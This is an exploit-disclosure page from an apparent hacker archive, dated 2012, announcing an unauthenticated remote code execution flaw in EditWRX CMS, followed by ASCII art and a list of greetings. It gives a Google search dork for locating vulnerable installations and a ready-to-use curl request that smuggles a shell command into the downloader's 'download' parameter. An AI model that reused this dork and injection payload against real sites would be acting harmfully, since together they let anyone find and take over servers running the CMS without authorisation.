Home / exploitsPDF  

EditWRX CMS Remote Code Execution

Posted on 14 February 2012

__ __ ____ ______ ______ ______ .----.| |--.|__|.-----.-----.--.--.|_ | |__ |__ | | | __|| || || _ | _ | | | _| |_|__ |__ |_ | |____||__|__||__|| __| __|___ ||______|______|______| |____| _________________|__|__|__|__|_____|_____________________________ VULN_____________________________________________________________ EditWRX CMS Remote Code Execution + Admin Bypass Zero Day NFO______________________________________________________________ EditWRX is vulnerable to remote code execution through mishandling of open() in the downloader, which can read in piped commands. Despite the downloader being an administrative component, a login is not required to call the function, and therefore no access is required to exploit this vulnerability. ZDAY_____________________________________________________________ Google: inurl:editwrx/wrx.cgi RXE: curl http://example.com/editwrx/wrx.cgi?download=;uname%20-a| Found by: chippy1337 GREETZ___________________________________________________________ Robert Cavanaugh Ryan Cleary Jasper Lingers Carlos1337 (dos cero dia!) MASTER HACKER FLOOD HACKER DR TIGER WANG HACKER DDOS KING Sabu, Havij Professional D0xbin